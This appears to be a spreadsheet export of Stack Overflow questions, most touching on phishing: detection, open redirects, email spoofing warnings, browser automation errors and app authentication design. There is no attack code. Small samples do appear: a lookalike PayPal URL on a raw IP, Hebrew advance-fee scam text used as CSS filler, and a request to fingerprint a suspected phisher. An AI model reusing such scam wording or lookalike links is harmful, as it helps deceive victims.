 &lt;p&gt;I know I'm really close here to having it working... The thing I believe is my hurdle here is that DevTools HTTP Requests fail on multiple attempts, eventually resulting in the InitSession failing because it fails to reach/attach to Opera.&lt;/p&gt;
 &lt;p&gt;My question... what am I missing here? With the other browsers we test like Chrome, IE11, FF, etc, launching the webdriver and attaching to the browser instance isn't hard at all. I'm afraid that whatever I'm missing is blatantly obvious and I'm just not seeing it. Of course, from what I've researched online, I didn't see anything clear and definitive when it comes to testing with Opera. Being tied into a specfific version has made this problem a bit more of a hurdle. Any input is much appreciated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;c#&gt;&lt;selenium&gt;&lt;opera&gt;&lt;chrome-devtools-protocol&gt;&lt;operadriver&gt;</t>
  </si>
  <si>
    <t>Using PHP/JavaScript link to get information about site visitor</t>
  </si>
  <si>
    <t>&lt;p&gt;Somebody is trying to phish me, they are pretending to be one of my close friends to humiliate both of us. This person has created a fake email account, impersonating the person, and trying to get personal info out of me. I made sure with my friend that it wasn't actually him, now we're trying to figure out who it is.&lt;/p&gt;
 &lt;p&gt;I want to send them a link to some kind of PHP or JS page, to collect at least a little info about their client (browser, operating system, maybe ISP location?), and then forward them to an actual website (like a youtube video or something).&lt;/p&gt;
 &lt;p&gt;Having very basic knowledge of PHP, I'd really appreciate any kind of script that would allow me to gather some basic info.&lt;/p&gt;
 &lt;p&gt;Thank you!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;php&gt;&lt;phishing&gt;&lt;data-harvest&gt;</t>
  </si>
  <si>
    <t>Capybara/Poltergeist HTTP Authentication</t>
  </si>
  <si>
    <t>&lt;p&gt;So im trying to run some automation testing on a Rails site that requires what seems to be a basic HTTP Authentication:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/gfJd0.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/gfJd0.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Im using localhost:3000 as my host. &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Capybara.app_host = "http://localhost:3000"
 Capybara.server_host = "localhost"
 Capybara.server_port = "3000"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Im running this on firefox right now, and I tried doing &lt;a href="http://username:password@localhost:3000" rel="nofollow noreferrer"&gt;http://username:password@localhost:3000&lt;/a&gt; but it usually warns about "phishing sites" but I proceed anyways, but it doesn't work and the http popup still appears. (I've heard a lot of browsers disabled this ability).&lt;/p&gt;
 &lt;p&gt;I know Selenium has ways to get around it, but what about Poltergeist? or anything built into Capybara.&lt;/p&gt;
 &lt;p&gt;I saw a previous question mentioned here: &lt;a href="https://stackoverflow.com/questions/4329985/http-basic-auth-for-capybara"&gt;HTTP basic auth for Capybara&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;but seeing as how the above url doesn't work this didn't seem to work either.&lt;/p&gt;
 &lt;p&gt;edit: Current Poltergeist driver setup:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;options = {
  :timeout =&amp;gt; 45,
  :phantomjs_options =&amp;gt; ["--proxy-auth="]
  }
  Capybara.register_driver :poltergeist do |app|
  Capybara::Poltergeist::Driver.new(app, options)
  end
  Capybara.default_driver = :selenium
  Capybara.javascript_driver = :poltergeist
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;automation&gt;&lt;capybara&gt;&lt;poltergeist&gt;</t>
  </si>
  <si>
    <t>Does commoncrawl contain only benign URLs? If yes, how they avoid indexing malicious URLs?</t>
  </si>
  <si>
    <t>&lt;p&gt;We would like to know whether commoncrawl database can be used as legitimate dataset for URL classification.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;url&gt;&lt;phishing&gt;&lt;common-crawl&gt;</t>
  </si>
  <si>
    <t>Avoiding phishing attacks in native mobile apps</t>
  </si>
  <si>
    <t>&lt;p&gt;I am currently designing a native app which will have a simple username / password login. On a valid authentication, the backend server is issuing a JWT access token and refresh token which are eventually used throughout subsequent API calls.&lt;/p&gt;
 &lt;p&gt;My concern is that using such an approach, my app can be prone to phishing whereby a hacker can decompile and recompile my app with malicious interceptors.&lt;/p&gt;
 &lt;p&gt;In order to overcome this, I was thinking of designing my Login API, so that rather than having an &lt;code&gt;accessToken&lt;/code&gt; and a &lt;code&gt;refreshToken&lt;/code&gt; in the payload response of the API, the Login API will issue a 301 Redirect on &lt;code&gt;myapp://some-path?accessToken=X&amp;amp;refreshToken=Y&lt;/code&gt;. This will ensure that if a phishing app is calling my APIs, the &lt;code&gt;accessToken&lt;/code&gt; and the &lt;code&gt;refreshToken&lt;/code&gt; are sent to the original APP.&lt;/p&gt;
 &lt;p&gt;Is this a correct approach? If not, which design would be suggested?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;ios&gt;&lt;authentication&gt;&lt;oauth-2.0&gt;&lt;jwt&gt;</t>
  </si>
  <si>
    <t>Phishing Website Detection using Machine Learning</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a semester project where I have to detect phishing website using ML. I have been using support vector binary classifier which is trained on an existing dataset to predict that whether a website is legitimate or not. The problem is SVMs need high calculations to train our data and are delicate with noisy data. Therefore, there is a high chance of overfitting. Is there any other classification model which will help to optimize my model?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;machine-learning&gt;&lt;classification&gt;&lt;detection&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How do I access this JSON Element? (PHP)</t>
  </si>
  <si>
    <t>&lt;p&gt;What am I doing wrong? This is my code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$json_url = &amp;quot;;
 $apikey = &amp;quot;..........&amp;quot;;
 $data_json = '{&amp;quot;user&amp;quot;:&amp;quot;...........&amp;quot;,
 &amp;quot;customer&amp;quot; {&amp;quot;username&amp;quot;:&amp;quot;.....&amp;quot;,&amp;quot;password&amp;quot;:&amp;quot;.....&amp;quot;,&amp;quot;phishing&amp;quot;:&amp;quot;.....&amp;quot;},&amp;quot;seller&amp;quot;:{&amp;quot;username&amp;quot;:&amp;quot;.....&amp;quot;,&amp;quot;password&amp;quot;:&amp;quot;......&amp;quot;,&amp;quot;phishing&amp;quot;:&amp;quot;.....&amp;quot;},&amp;quot;amount&amp;quot;:10000,&amp;quot;platform&amp;quot;:&amp;quot;ps&amp;quot;}';
  $ch = curl_init($json_url);
  curl_setopt_array($ch, array(
  CURLOPT_POST =&amp;gt; true,
  CURLOPT_POSTFIELDS =&amp;gt; $data_json,
  CURLOPT_HEADER =&amp;gt; true,
  CURLOPT_HTTPHEADER =&amp;gt; array(
  'Connection: keep-alive',
  'Accept: application/json',
  'Content-Type: application/json; charset=utf-8',
  'Host: futservices.com',
  'Content-Length: '.strlen($data_json).'',
  'Accept-Encoding: gzip'
  ))
  );
  $response = curl_exec($ch);
  curl_close($ch);
  echo $response;
  $order = json_decode($response, true);
  echo &amp;quot;Your Token Is: &amp;quot;.$order['d'];`
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The request goes through fine, however, I want to grab the &amp;quot;d&amp;quot; JSON element that sent by in a JSON Response from the API.&lt;/p&gt;
 &lt;p&gt;This is the response:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Length: 44 Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sat, 25 Apr 2015 16:58:09 GMT {&amp;quot;d&amp;quot;:&amp;quot;d922bad4-60d8-4fe4-9cba-0231328744a0&amp;quot;}1Your Token Is:
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;As you can see &amp;quot;d&amp;quot; is not echoed after &amp;quot;Your Token Is: &amp;quot;.
 How can I resolve this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;json&gt;</t>
  </si>
  <si>
    <t>Why Open Redirect URLS?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been going through the OWASP top 10 to get a deeper understanding of each specific type of vulnerability. I've made my way to the last item, Unvalidated URL Redirects. I understand the attack; such a phishing scheme seems completely obviously now that I have read about it in OWASP. What I am struggling to understand is why this style of redirecting ever occurs in the first place.&lt;/p&gt;
 &lt;p&gt;There must be some advantage(s) to including the redirect URL as a parameter in the URL&lt;/p&gt;
 &lt;p&gt;ie &lt;code&gt;example.com/go.php?url=newpage.php&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;rather than using many of the other possible redirect schemes. Even if the url parameter is generated dynamically, couldn't it still be sent through POST to prevent the creation of malicious URLS? Why does Google allow anyone to send "I'm Feeling Lucky" redirect urls like &lt;a href="http://www.google.com/search?hl=en&amp;amp;source=hp&amp;amp;q=stack+overflow&amp;amp;btnI=I%27m+Feeling+Lucky&amp;amp;aq=0&amp;amp;aqi=g10&amp;amp;aql=&amp;amp;oq=stack+over&amp;amp;gs_rfai=CRiIY46tgTJetDZXcygTKj7DICgAAAKoEBU_QgM4H" rel="nofollow noreferrer"&gt;this one&lt;/a&gt; that goes to Stack Overflow?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;redirect&gt;&lt;owasp&gt;</t>
  </si>
  <si>
    <t>Murphy's Law applied to Internet Security</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm a fanatic of Murphy's Law and I have it in mind at programming time. There are a lot of "applied" versions in a variety of fields. Maybe (as stack overflow users) we can compile a list of them &lt;strong&gt;applied to Internet Security&lt;/strong&gt;. I suggest this because in times of phishing, XSS, CSRF and a lot more of treats surrounding the programmer and the users it would be a good idea to have a list of what to expect in order to keep track of possible vulnerabilities in your apps and systems. &lt;/p&gt;
 &lt;p&gt;An example would be: 
 "Vulnerabilities appears spontaneously but they don't disappear in the same way". &lt;/p&gt;
 &lt;p&gt;Please show your ideas about it.
 Thanks in advance.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to check a part of string with regex pattern in python</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to check if a string contains some part that matches a given regex pattern.
 My regex is to check for the presence of an IP address, it goes like this&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;regex = '''^(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.( 
  25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.( 
  25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.( 
  25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)$'''
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I want to check if a string like this contains an IP address in it&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;url_string = &amp;quot;http://110.234.52.124/paypal.ca/index.html&amp;quot;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;since it has an IP address, I want to detect that, how can I do that?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python-3.x&gt;&lt;regex&gt;&lt;ip&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>ChromeDriver hanging sporadically, DevTools request failed. Chrome not reachable error</t>
  </si>
  <si>
    <t>&lt;p&gt;Tests fail sporadically with the error of "Chrome not reachable".&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Throwing a WebDriver exception: chrome not reachable
  (Driver info: chromedriver=2.35.528161 (5b82f2d2aae0ca24b877009200ced9065a772e73),platform=Windows NT 6.1.7601 SP1 x86_64) (WARNING: The server did not provide any stacktrace information)
 Command duration or timeout: 60.26 seconds
 Build info: version: '3.7.1', revision: '8a0099a', time: '2017-11-06T21:01:39.354Z'
 System info: host: 'XXXXXXXX', ip: 'XXXXXXXXX', os.name: 'Windows 7', os.arch: 'amd64', os.version: '6.1', java.version: '1.8.0_144'
 Driver info: driver.version: Driver
 Exception : org.openqa.selenium.NoSuchSessionException: Session ID is null. Using WebDriver after calling quit()?
 Build info: version: '3.7.1', revision: '8a0099a', time: '2017-11-06T21:01:39.354Z'
 System info: host: 'XXXXXXXX', ip: 'XXXXXXXXX', os.name: 'Windows 7', os.arch: 'amd64', os.version: '6.1', java.version: '1.8.0_144'
 Driver info: driver.version: Driver
 [ERROR] Driver Initialize - Error initializing driver for browser 'CHROME'. chrome not reachable
  (Driver info: chromedriver=2.35.528161 (5b82f2d2aae0ca24b877009200ced9065a772e73),platform=Windows NT 6.1.7601 SP1 x86_64) (WARNING: The server did not provide any stacktrace information)
 Command duration or timeout: 60.26 seconds
 Build info: version: '3.7.1', revision: '8a0099a', time: '2017-11-06T21:01:39.354Z'
 System info: host: 'XXXXXXXXXX', ip: 'XXXXXXXXX', os.name: 'Windows 7', os.arch: 'amd64', os.version: '6.1', java.version: '1.8.0_144'
 Driver info: driver.version: Driver
 org.openqa.selenium.WebDriverException: chrome not reachable
  (Driver info: chromedriver=2.35.528161 (5b82f2d2aae0ca24b877009200ced9065a772e73),platform=Windows NT 6.1.7601 SP1 x86_64) (WARNING: The server did not provide any stacktrace information)
 Command duration or timeout: 60.26 seconds
 Build info: version: '3.7.1', revision: '8a0099a', time: '2017-11-06T21:01:39.354Z'
 System info: host: 'XXXXXXXX', ip: 'XXXXXXXXX', os.name: 'Windows 7', os.arch: 'amd64', os.version: '6.1', java.version: '1.8.0_144'
 Driver info: driver.version: Driver
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When I do some logging I see the error is with the DevTools request failing. This happens sporadically. It looks like chromedriver creates a new port for debugging for each test and sometimes Chromedriver can't connect to the new port. Not sure why and don't know how to fix it. Anyone experience this?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; [1516896066.375][INFO]: Launching chrome: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --disable-web-resources --enable-automation --enable-logging --force-fieldtrials=SiteIsolationExtensions/Control --ignore-certificate-errors --load-extension="C:\Users\mna7158\AppData\Local\Temp\scoped_dir6732_10840\internal" --log-level=0 --metrics-recording-only --no-first-run --password-store=basic --remote-debugging-port=12923 --test-type=webdriver --use-mock-keychain --user-data-dir="C:\Users\mna7158\AppData\Local\Temp\scoped_dir6732_15347" data:,
 [1516896066.431][DEBUG]: DevTools request: http://localhost:12923/json/version
 [1516896068.429][DEBUG]: DevTools request failed
 [1516896068.480][DEBUG]: DevTools request: http://localhost:12923/json/version
 [1516896068.688][DEBUG]: DevTools request failed
 [1516896068.739][DEBUG]: DevTools request: http://localhost:12923/json/version
 [1516896070.481][DEBUG]: DevTools request failed
 [1516896070.532][DEBUG]: DevTools request: http://localhost:12923/json/version
 [1516896070.742][DEBUG]: DevTools request failed
 [1516896070.793][DEBUG]: DevTools request: http://localhost:12923/json/version
 [1516896072.532][DEBUG]: DevTools request failed
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Specifications:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Chrome version 64 (64 bit)&lt;/li&gt;
 &lt;li&gt;OS = Windows 7&lt;/li&gt;
 &lt;li&gt;Chromedriver 2.35&lt;/li&gt;
 &lt;li&gt;Selenium-Java 3.7.1&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Sample code that I get this error with.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;import org.openqa.selenium.By;
 import org.openqa.selenium.WebDriver;
 import org.openqa.selenium.WebElement;
 import org.openqa.selenium.chrome.ChromeDriver;
 import org.openqa.selenium.support.ui.ExpectedConditions;
 import org.openqa.selenium.support.ui.WebDriverWait;
 import org.testng.annotations.AfterMethod;
 import org.testng.annotations.BeforeMethod;
 import org.testng.annotations.Test;
 public class chromeDriverExample {
 public WebDriver driver;
 WebDriverWait wait;
 @BeforeMethod
 public void beforeMethod() {
  System.setProperty("webdriver.chrome.driver", "src//test//resources//drivers//chromedriver.exe");
  System.setProperty("webdriver.chrome.verboseLogging", "true");
  driver = new ChromeDriver();
  wait = new WebDriverWait(driver, 30);
 }
 @AfterMethod
 public void afterMethod() {
  driver.close();
  driver.quit();
 }
 @Test(invocationCount = 15)
 public void chromeTest() {
  driver.get("https://google.com");
  wait.until(ExpectedConditions.presenceOfElementLocated(By.name("q")));
 }
 }
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;google-chrome&gt;&lt;selenium-webdriver&gt;&lt;webdriver&gt;&lt;google-chrome-devtools&gt;&lt;selenium-chromedriver&gt;</t>
  </si>
  <si>
    <t>Use of other's SMTP server to send emails to avoid on be half of or phishing warning</t>
  </si>
  <si>
    <t>&lt;p&gt;I am creating a tool for project managers. For notifications, we have done automated email module. Whenever email gets sent to team members, it says &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; FROM : "Sushant Danekar" "&amp;lt;"notification@mytestserver.com"&amp;gt;"
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;or in some software it Says&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; on behalf of 'Sushant Danekar'.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I had added &lt;code&gt;sender's&lt;/code&gt; email address in &lt;code&gt;Reply-To&lt;/code&gt; field while I had added &lt;code&gt;"notification@mytestserver.com"&lt;/code&gt; email address in &lt;code&gt;FROM&lt;/code&gt; field.&lt;/p&gt;
 &lt;p&gt;To avoid above mentioned issue I changed &lt;code&gt;From&lt;/code&gt; address to &lt;code&gt;Sender's email address&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;But now, Gmail has marked my message as spam and it says &lt;strong&gt;"this message may not have been sent by"&lt;/strong&gt;. &lt;/p&gt;
 &lt;p&gt;I need a suggession to avoid both of these issue 1) &lt;code&gt;On behalf of&lt;/code&gt; 2) &lt;code&gt;this message may not have been&lt;/code&gt;. &lt;/p&gt;
 &lt;p&gt;I am open for all suggestions &lt;/p&gt;
 &lt;p&gt;I also thought of accepting SMTP details [username, password and SMTP server details] from user and while sending an email. &lt;/p&gt;
 &lt;p&gt;Is it the right way? Does it create problem for our tool in future ? What are the RFC standards ? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;email&gt;&lt;smtp&gt;&lt;spam-prevention&gt;</t>
  </si>
  <si>
    <t>Link to facebook from my website is considered potential phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I own a website featuring a web page ( &lt;a href="http://digilander.libero.it/karmaproductions/MakHOME.htm" rel="nofollow"&gt;http://digilander.libero.it/karmaproductions/MakHOME.htm&lt;/a&gt; ) that is intended to be used as a "browser home page", which includes a link to Facebook. 
 Since a few days/weeks (I don't know for sure), when clicking on this link, a warning is received by Facebook ( &lt;a href="https://www.facebook.com/w.php?h=AeQ_7Doivu7wB392" rel="nofollow"&gt;https://www.facebook.com/w.php?h=AeQ_7Doivu7wB392&lt;/a&gt; ):&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Warning&lt;/p&gt;
  &lt;p&gt;The website directing you here was not a Facebook page. If you entered
  your Facebook login information on the previous site, you will need to
  change your password. To learn more about staying safe on the
  internet, visit our Security Page. You can also check out the phishing
  Wikipedia article.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;My website is no phishing or scam, how can I prevent my users from receiving this scary message?
 Is there a way to put my website in a "whitelist" of trusted referrers? Internet Archive proves my above cited web page is trustworthy since many years now.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;facebook&gt;&lt;security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Borders in IE8 don't look right in right-to-left languages</t>
  </si>
  <si>
    <t>&lt;p&gt;I am currently converting a site to Hebrew which is our first right-to-left language. I am having trouble with an element that has a border on it. We have to support IE8+ and Chrome and Firefox, and it looks fine in every browser except IE8. &lt;/p&gt;
 &lt;p&gt;Here is how the text should render, with the borders showing up correctly:&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/lxYz2.png" alt="correct rendering"&gt;&lt;/p&gt;
 &lt;p&gt;Here is how IE8 renders the borders, no longer making sense in a RTL language:&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/cAEHm.png" alt="IE8 rendering"&gt;&lt;/p&gt;
 &lt;p&gt;Does anyone know of any fixes for this? Thanks.&lt;/p&gt;
 &lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="false" data-babel="false"&gt;
 &lt;div class="snippet-code"&gt;
 &lt;pre class="snippet-code-css lang-css prettyprint-override"&gt;&lt;code&gt;.wrapper {
  width:680px;
  direction:rtl;
 }
 .phishing-dp {
  border: solid 2px #004B7E;
  border-radius:5px;
 }&lt;/code&gt;&lt;/pre&gt;
 &lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;div class="wrapper"&amp;gt;◊û◊û◊©◊ú◊™◊ô ◊î◊§◊õ◊î ◊ú◊ë◊ú◊™◊ô ◊ô◊¶◊ô◊ë◊î ◊û◊ê◊ï◊ì, ◊ï◊ê◊†◊ô ◊û◊ó◊§◊© ◊û◊ô◊©◊î◊ï ◊©◊ô◊í◊ü ◊¢◊ú ◊î◊î◊ï◊ü ◊©◊ë◊®◊©◊ï◊™◊ô ◊¢◊ì ◊©◊î◊¢◊†◊ô◊ô◊ü ◊ô◊ô◊®◊í◊¢. ◊ê◊¢◊ë◊ô◊® ◊°◊õ◊ï◊ù ◊©◊ú 850,000 ◊ì◊ï◊ú◊® ◊ê◊®◊î"◊ë ◊ú◊ó◊©◊ë◊ï◊†◊ö, ◊ï◊ê◊ó◊® ◊õ◊ö ◊ê◊ë◊ß◊©◊ö ◊ú◊î◊ó◊ñ◊ô◊® 700,000 ◊ì◊ï◊ú◊® ◊ê◊®◊î"◊ë ◊ú◊ó◊©◊ë◊ï◊†◊ô ◊ú◊ê◊ó◊® ◊î◊™◊ô◊ô◊¶◊ë◊ï◊™ ◊î◊û◊û◊©◊ú◊î. &amp;lt;span class="phishing-dp"&amp;gt;◊õ◊ö ◊ô◊ô◊©◊ê◊®◊ï ◊ú◊ö 150,000 ◊ì◊ï◊ú◊® ◊ë◊™◊û◊ï◊®◊î ◊ú◊û◊ê◊û◊¶◊ô◊ö&amp;lt;/span&amp;gt;.&amp;lt;/div&amp;gt;&lt;/code&gt;&lt;/pre&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;css&gt;&lt;internet-explorer-8&gt;&lt;right-to-left&gt;</t>
  </si>
  <si>
    <t>How the IBM MobileFirst application is protected from phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;What are the attributes in the code that are actually protecting the IBM MobileFirst hybrid application from phishing. If possible please explain with an example. Thanks in advance.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ibm-mobilefirst&gt;</t>
  </si>
  <si>
    <t>Convert R JSON Twitter data to list</t>
  </si>
  <si>
    <t>&lt;p&gt;When using SearchTwitter, I converted to dataframe and then exported to JSON. However, all the text is in one line, etc (sample below). I need to separate so that each tweet is its own.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;phish &amp;lt;- searchTwitteR('phish', n = 5, lang = 'en')
 phishdf &amp;lt;- do.call("rbind", lapply(phish, as.data.frame))
 exportJson &amp;lt;-toJSON(phishdf)
 write(exportJson, file = "phishdf.json")
 json_phishdf &amp;lt;- fromJSON(file="phishdf.json")
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I tried converting to a list and am wondering if maybe converting to a data frame is a mistake. &lt;/p&gt;
 &lt;p&gt;However, for a list, I tried:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;newlist['text']=phish[[1]]$getText()
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;But this will just give me the text for the first tweet. Is there a way to iterate over the entire data set, maybe in a for loop?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;{"text":["@ilazer @abbijacobson I do feel compelled to say that I phind phish awphul... sorry, Abbi!","@phish This on-sale was an embarrassment. Something needs to change.","FS: Have 2 Tix To Phish In Chula Vista @Phish #facevaluetickets #phish #facevalue GO: https://t.co/dFdrpyaotp","RT @WKUPhiDelt: Come unwind from a busy week of class and kick off the weekend with a Phish Fry! 4:30-7:30 at the Phi Delt house. Cost is $\u2026","RT @phish: Tickets for Phish's July 15 &amp;amp;amp; 16 shows at The Gorge go on sale in fifteen minutes at 1PM ET: https://t.co/tEKLNjI5u7 https://t.c\u2026"],
 "favorited":[false,false,false,false,false],
 "favoriteCount":[0,0,0,0,0],
 "replyToSN":["rAlexandria","phish","NA","NA","NA"],
 "created":[1456521159,1456521114,1456521022,1456521016,1456520988],
 "truncated":[false,false,false,false,false],
 "replyToSID":["703326502629277696","703304948990222337","NA","NA","NA"],
 "id":["703326837720662016","703326646074343424","703326261045829632","703326236722991105","703326119328686080"],
 "replyToUID":["26152867","14503997","NA","NA","NA"],"statusSource":["&amp;lt;a href=\"https://mobile.twitter.com\" rel=\"nofollow\"&amp;gt;Mobile Web (M5)&amp;lt;/a&amp;gt;","&amp;lt;a href=\"http://twitter.com/download/iphone\" rel=\"nofollow\"&amp;gt;Twitter for iPhone&amp;lt;/a&amp;gt;","&amp;lt;a href=\"http://cashortrade.org\" rel=\"nofollow\"&amp;gt;CashorTrade - Face Value Tickets&amp;lt;/a&amp;gt;","&amp;lt;a href=\"http://twitter.com/download/iphone\" rel=\"nofollow\"&amp;gt;Twitter for iPhone&amp;lt;/a&amp;gt;","&amp;lt;a href=\"http://twitter.com/download/android\" rel=\"nofollow\"&amp;gt;Twitter for Android&amp;lt;/a&amp;gt;"],
 "screenName":["rAlexandria","adamgelvan","CashorTrade","Kyle_Smith1087","timogrennell"],
 "retweetCount":[0,0,0,2,5],
 "isRetweet":[false,false,false,true,true],
 "retweeted":[false,false,false,false,false],
 "longitude":["NA","NA","NA","NA","NA"],
 "latitude":["NA","NA","NA","NA","NA"]}
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;r&gt;</t>
  </si>
  <si>
    <t>gmail phishing scam - how is the information captured?</t>
  </si>
  <si>
    <t>&lt;p&gt;In this Fortune article - &lt;a href="http://fortune.com/2017/01/18/google-gmail-scam-phishing/" rel="nofollow noreferrer"&gt;http://fortune.com/2017/01/18/google-gmail-scam-phishing/&lt;/a&gt; - they say:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;As soon as a person enters her username and password into the fields,
  the attackers capture the information.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;What do they mean by "the attackers capture the information"? Is there a script that captures the username and password and then posts the data (over HTTP, TCP, etc) to the hacker's server somewhere?&lt;/p&gt;
 &lt;p&gt;Curious to know the details.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;data-uri&gt;</t>
  </si>
  <si>
    <t>openssl phishing : V claims to be A</t>
  </si>
  <si>
    <t>&lt;p&gt;there are several components of my application, needs their communication secure in the sense Origin Verified. these components cannot share a common secret. So I have to opt for asymmetric key encryption. assuming I've two components &lt;code&gt;A&lt;/code&gt; and &lt;code&gt;B&lt;/code&gt; A sends some data &lt;code&gt;F&lt;/code&gt; to &lt;code&gt;B&lt;/code&gt; and &lt;code&gt;B&lt;/code&gt; has to verify that it really came from &lt;code&gt;A&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;A&lt;/code&gt; generates digest &lt;code&gt;H&lt;/code&gt; of &lt;code&gt;F&lt;/code&gt; with its private Key&lt;br /&gt;
 &lt;code&gt;A&lt;/code&gt; attaches &lt;code&gt;A_pub&lt;/code&gt;, &lt;code&gt;H&lt;/code&gt; to its request Parameters, sends &lt;code&gt;F&lt;/code&gt; and declares origin/sender as &lt;code&gt;A&lt;/code&gt; &lt;br /&gt;
 &lt;code&gt;B&lt;/code&gt; verifies the digest &lt;code&gt;H&lt;/code&gt; with the &lt;code&gt;A_pub&lt;/code&gt; provided against &lt;code&gt;F&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;apparently it looks Okay But if some other component &lt;code&gt;V&lt;/code&gt; does the same with &lt;code&gt;V_pub&lt;/code&gt; and claims itself as &lt;code&gt;A&lt;/code&gt;, &lt;code&gt;B&lt;/code&gt; still thinks the request came from &lt;code&gt;A&lt;/code&gt; as this &lt;code&gt;H&lt;/code&gt; is made with &lt;code&gt;V_prv&lt;/code&gt; openssl verifies Okay.&lt;/p&gt;
 &lt;p&gt;I want to give protection against this attack of &lt;code&gt;V&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;I am using &lt;code&gt;ecparam&lt;/code&gt; &lt;code&gt;secp112r1&lt;/code&gt; to minimize key length. and keys are repeatedly changed.&lt;/p&gt;
 &lt;p&gt;-- &lt;strong&gt;EDIT&lt;/strong&gt; --&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;A&lt;/code&gt;, &lt;code&gt;B&lt;/code&gt; and &lt;code&gt;V&lt;/code&gt; are application components identified by unique &lt;code&gt;URI&lt;/code&gt;. Its currently intended to constraint secure page flow. e.g. you can assume &lt;code&gt;A&lt;/code&gt;, &lt;code&gt;B&lt;/code&gt;, &lt;code&gt;V&lt;/code&gt; be urls What I want is Only &lt;code&gt;A&lt;/code&gt; can procced to &lt;code&gt;B&lt;/code&gt; and only &lt;code&gt;B&lt;/code&gt; can proceed to &lt;code&gt;C&lt;/code&gt; .... and I don't want to maintain a global/application wide session for that. so If &lt;code&gt;B&lt;/code&gt; can just verify the origin of this link based on the special parameters &lt;code&gt;A&lt;/code&gt; have passed to it in a state/session-less manner. and the more generic it can be the more reusable it will be to implement in other scenarios too.&lt;/p&gt;
